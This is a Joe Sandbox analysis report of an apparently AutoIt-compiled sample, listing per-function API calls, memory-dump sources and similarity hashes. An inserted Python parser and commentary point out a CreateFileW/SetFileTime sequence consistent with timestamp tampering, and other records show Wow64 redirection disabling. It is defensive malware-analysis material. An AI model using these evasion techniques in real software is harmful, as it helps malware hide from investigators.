                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB1BFC
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB1C07
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB1C12
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB1C1A
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB1C22
                                                                                                                    • Part of subcall function 00AB1B4A: RegisterWindowMessageW.USER32(00000004,?,00AB12C4), ref: 00AB1BA2
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AB136A
                                                                                                                  • OleInitialize.OLE32 ref: 00AB1388
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00AF24AB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1986988660-0
                                                                                                                  • Opcode ID: 39c9afad42bf739e30acab439e8227d389896e38d2e484199f8fcbe68330ac7e
                                                                                                                  • Instruction ID: 3e0895d71f4b079590da3819f891d3f9ea2cf03deac7d6e244ba6b202b7f4f5b
                                                                                                                  • Opcode Fuzzy Hash: 39c9afad42bf739e30acab439e8227d389896e38d2e484199f8fcbe68330ac7e
                                                                                                                  • Instruction Fuzzy Hash: 517199B59132008EC384EF7DE956A953AECBBA87447588A6AD40AD7372EF308503CF55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB3A04
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B1C259
                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00B1C261
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B1C270
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3500052701-0
                                                                                                                  • Opcode ID: 207a17f0ab566cfe917ae1337944bf42f87ee02ef5e889294c5d178978ee9bc4
                                                                                                                  • Instruction ID: bf21412ad990b31b6051781703a2081f20cd92f6ea10b7c9c6179e10e6e49301
                                                                                                                  • Opcode Fuzzy Hash: 207a17f0ab566cfe917ae1337944bf42f87ee02ef5e889294c5d178978ee9bc4
                                                                                                                  • Instruction Fuzzy Hash: 9531BF70944344AFEB628F648895BEABFECAB17708F0004DAD69AA7241C7745AC5CB91
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,?,?,00AE85CC,?,00B78CC8,0000000C), ref: 00AE8704
                                                                                                                  • GetLastError.KERNEL32(?,00AE85CC,?,00B78CC8,0000000C), ref: 00AE870E
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AE8739
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2583163307-0
                                                                                                                  • Opcode ID: 3c24398a941d73121efd9bd1d99dd12e7ecfb70f92334443c684335315ffae1f
                                                                                                                  • Instruction ID: 5959a02716125386a03a26eab08b76c52700a985a21ee86e97f98f6ec99ab80c
                                                                                                                  • Opcode Fuzzy Hash: 3c24398a941d73121efd9bd1d99dd12e7ecfb70f92334443c684335315ffae1f
                                                                                                                  • Instruction Fuzzy Hash: CA018E32A052E016C2607336BA4577E7B594B83B78F390119F81C8F1D2DEB8CC81C250
                                                                                                                  APIs
                                                                                                                  • TranslateMessage.USER32(?), ref: 00ABDB7B
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00ABDB89
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABDB9F
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00ABDBB1
                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00B01CC9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3288985973-0
                                                                                                                  • Opcode ID: c33338397eb26229f2f64f00dd81511fad9964eb22727c9b63bf39140c8189ea
                                                                                                                  • Instruction ID: 50bafa809b6447c90c4ae8a9512c00a624b2e656473b5e053e385bee02e150f1
                                                                                                                  • Opcode Fuzzy Hash: c33338397eb26229f2f64f00dd81511fad9964eb22727c9b63bf39140c8189ea
                                                                                                                  • Instruction Fuzzy Hash: 33F05E306463409BEB74CBA48C49FEA7BECEB45710F104A58E61A970D0EB309948CB25
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B22CD4,?,?,?,00000004,00000001), ref: 00B22FF2
                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B23006
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00B22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B2300D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  • Opcode ID: 122adbe2a1ccb17448f8d0260e6cb5dc129079ff1f344eeb6e7938476d3a3475
                                                                                                                  • Instruction ID: 1c03cf5343ccd3e9a4b6aa4bfc0676cefa89ff2b999b4a9e82cb4b84e2312701
                                                                                                                  • Opcode Fuzzy Hash: 122adbe2a1ccb17448f8d0260e6cb5dc129079ff1f344eeb6e7938476d3a3475
                                                                                                                  • Instruction Fuzzy Hash: 0CE0863628122077D6301759BC0DF8B3E5CE787F71F104210F759760D04AA06A0142A8
                                                                                                                  APIs
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00AC17F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Init_thread_footer
                                                                                                                  • String ID: CALL
                                                                                                                  • API String ID: 1385522511-4196123274
                                                                                                                  • Opcode ID: 708ec279867b7b6a292561d6230e55ffa8f200589d6568e9ddfdc6c15ba2a6ea
                                                                                                                  • Instruction ID: e973768b3f7353bee51c43b8497cf4d6d9f38a3794ca4198acd62aab9972c63c
                                                                                                                  • Opcode Fuzzy Hash: 708ec279867b7b6a292561d6230e55ffa8f200589d6568e9ddfdc6c15ba2a6ea
                                                                                                                  • Instruction Fuzzy Hash: EB2269706082019FC714DF24C990F2ABBF1BF96314F25896DF49A8B3A2D731E955CB92
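The records above (an "APIs" list, the "Memory Dump Source", the IDA plugin snapshot and the "Similarity" IDs, one block per recovered function) are what an analyst pivots on when comparing this sample with other reports, so it is worth having them as data rather than rendered text. The parser below is an added example for this page, not Joe Sandbox code or tooling. It assumes that every record ends at its "Instruction Fuzzy Hash" line, that the "Download File" text fused onto the Associated lines is link residue to be stripped, and that argument lists never contain a closing parenthesis; the sample input is copied from two of the records above with their Associated lines abridged.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source / Similarity).
Added example for this report, not Joe Sandbox code. Field names come from the
report text; ending a record at its "Instruction Fuzzy Hash" line is an assumption."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API-call line: "CreateFileW.KERNELBASE(?,40000000,...), ref: 00B22FF2" or,
# without an argument list, "OleInitialize.OLE32 ref: 00AB1388".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
HEX = re.compile(r"^[0-9a-fA-F]+$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str]  # set for "Part of subcall function ..." lines


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", ...
    associated: list = field(default_factory=list)

    def direct_calls(self):
        """API names the function calls itself (subcall lines excluded), in listed order."""
        return [c.name for c in self.calls if c.subcall_of is None]

    def problems(self):
        """Sanity checks before pivoting on the IDs: all hex, Opcode ID == Opcode Fuzzy Hash."""
        keys = ("Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
        out = [f"{k} missing or not hex" for k in keys if not HEX.match(self.fields.get(k, ""))]
        if self.fields.get("Opcode ID") != self.fields.get("Opcode Fuzzy Hash"):
            out.append("Opcode ID differs from Opcode Fuzzy Hash")
        return out


def parse_records(text):
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ")  # drop indentation and the bullet
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Associated":
            # The rendered page fuses the "Download File" link label onto the dump name.
            cur.associated.append(value.removesuffix("Download File").strip())
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":  # last field of every record
            records.append(cur)
            cur, section = FunctionRecord(), None
    return records


def find_sequence(records, wanted):
    """Records whose direct calls contain `wanted` as an ordered subsequence."""
    hits = []
    for r in records:
        it = iter(r.direct_calls())
        if all(w in it for w in wanted):  # each `in` consumes the iterator up to the match
            hits.append(r)
    return hits


# Constructed input: two records copied from the report above, Associated lines abridged.
SAMPLE = """APIs
  • Part of subcall function 00AB3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB3A04
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B1C259
• KillTimer.USER32(?,00000001,?,?), ref: 00B1C261
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B1C270
Similarity
• API ID: IconNotifyShell_Timer$Kill
• API String ID: 3500052701-0
• Opcode ID: 207a17f0ab566cfe917ae1337944bf42f87ee02ef5e889294c5d178978ee9bc4
• Instruction ID: bf21412ad990b31b6051781703a2081f20cd92f6ea10b7c9c6179e10e6e49301
• Opcode Fuzzy Hash: 207a17f0ab566cfe917ae1337944bf42f87ee02ef5e889294c5d178978ee9bc4
• Instruction Fuzzy Hash: 9531BF70944344AFEB628F648895BEABFECAB17708F0004DAD69AA7241C7745AC5CB91
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B22CD4,?,?,?,00000004,00000001), ref: 00B22FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B23006
• CloseHandle.KERNEL32(00000000,?,00B22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B2300D
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 122adbe2a1ccb17448f8d0260e6cb5dc129079ff1f344eeb6e7938476d3a3475
• Instruction ID: 1c03cf5343ccd3e9a4b6aa4bfc0676cefa89ff2b999b4a9e82cb4b84e2312701
• Opcode Fuzzy Hash: 122adbe2a1ccb17448f8d0260e6cb5dc129079ff1f344eeb6e7938476d3a3475
• Instruction Fuzzy Hash: 0CE0863628122077D6301759BC0DF8B3E5CE787F71F104210F759760D04AA06A0142A8
"""
```

Run against the full report text, `find_sequence(records, ["CreateFileW", "SetFileTime", "CloseHandle"])` returns the function at ref 00B22FF2 above; its second CreateFileW argument 40000000 is GENERIC_WRITE and the fifth, 00000003, is OPEN_EXISTING, so the function opens a file that already exists for writing and then calls SetFileTime on it, which is the pattern to look for when checking whether a sample rewrites file timestamps. `problems()` confirms what holds for every record on this page, that the Opcode ID is identical to the Opcode Fuzzy Hash, before either value is used as a pivot into other reports.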
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B26F6B
                                                                                                                    • Part of subcall function 00AB4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EFD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad_wcslen
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                  • API String ID: 3312870042-2806939583
                                                                                                                  • Opcode ID: da847024257e3d506bb18a2a6a093e1e87360e3fde0dcb584c3ff003a283e371
                                                                                                                  • Instruction ID: 4507994cc6628236de2de8609ff062bfd5154fd5e809db932475d7e047d48fdd
                                                                                                                  • Opcode Fuzzy Hash: da847024257e3d506bb18a2a6a093e1e87360e3fde0dcb584c3ff003a283e371
                                                                                                                  • Instruction Fuzzy Hash: C6B17F311082118FCB14EF24D5919AEB7E9EF95310F14899DF49A972A2EF30ED49CB92
                                                                                                                  APIs
                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00AF2C8C
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                    • Part of subcall function 00AB2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB2DC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 779396738-3081909835
                                                                                                                  • Opcode ID: e0e6b21705ed138d5e7a76c5536ffd901433db3f5e8d0ab2214a8cb136bbe526
                                                                                                                  • Instruction ID: d2d12958b96c06ca088b1cf96b2f858ebfe6f28abe9a35a3db7dc92395f348bb
                                                                                                                  • Opcode Fuzzy Hash: e0e6b21705ed138d5e7a76c5536ffd901433db3f5e8d0ab2214a8cb136bbe526
                                                                                                                  • Instruction Fuzzy Hash: 6A219371A1029C9FDF01DF94C945BEE7BFCAF49704F00805AE519A7242DBB49A898F61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 2638373210-3962188686
                                                                                                                  • Opcode ID: b6e3a6b58d39e1fa3b3f35aad69937d9185e5dba7ef5c599f1d918d38dbbd97f
                                                                                                                  • Instruction ID: d05667f5f4e947f4bccf35e2c84a86582ed4da1cf3b53cd4943ef48e5b2257b0
                                                                                                                  • Opcode Fuzzy Hash: b6e3a6b58d39e1fa3b3f35aad69937d9185e5dba7ef5c599f1d918d38dbbd97f
                                                                                                                  • Instruction Fuzzy Hash: 1301B5729042687EDF18D7A8C856FEEBBF8DB15301F00859AE157D6281E5B4E6088B60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0180C388: GetFileAttributesW.KERNELBASE(?), ref: 0180C393
                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0180CC62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesCreateDirectoryFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3401506121-0
                                                                                                                  • Opcode ID: 40d8f815fe7be4bf717deb0523bb32188491e077edadd03834df031e9b0a18f5
                                                                                                                  • Instruction ID: 1d2af44cc715d7ecd3b2327b896e0f84a32a6f5355a781ca64bee9f73dd7099a
                                                                                                                  • Opcode Fuzzy Hash: 40d8f815fe7be4bf717deb0523bb32188491e077edadd03834df031e9b0a18f5
                                                                                                                  • Instruction Fuzzy Hash: 0B517131A1120D96EF14EFA4C844BEF7739EF58300F1085A9A909F72D0EB399B04C7A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction ID: c9002a7a25bee37304568fd78a2d9565a67a3360f6fb281b67c7851b92579f03
                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                  • Instruction Fuzzy Hash: 6F31E274A041099FCB19CF59D480E69FBB2FF49314B2686A9E80ACB656D731EDC1CBC0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E9C
                                                                                                                    • Part of subcall function 00AB4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB4EAE
                                                                                                                    • Part of subcall function 00AB4E90: FreeLibrary.KERNEL32(00000000,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EC0
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EFD
                                                                                                                    • Part of subcall function 00AB4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E62
                                                                                                                    • Part of subcall function 00AB4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4E74
                                                                                                                    • Part of subcall function 00AB4E59: FreeLibrary.KERNEL32(00000000,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E87
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2632591731-0
                                                                                                                  • Opcode ID: a75ec7d7bb407f92b814943f9103bbdfb17f5f2bbe03f90d5c756776c51cc739
                                                                                                                  • Instruction ID: ac533453b308c8c176ff0d558422c5b4342dfe5335b87a53f4b09563ec1ed635
                                                                                                                  • Opcode Fuzzy Hash: a75ec7d7bb407f92b814943f9103bbdfb17f5f2bbe03f90d5c756776c51cc739
                                                                                                                  • Instruction Fuzzy Hash: 54119432610205AADF14FB74DD02BED77A9AF44B10F104429F542AB1D3DE70DA459B50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
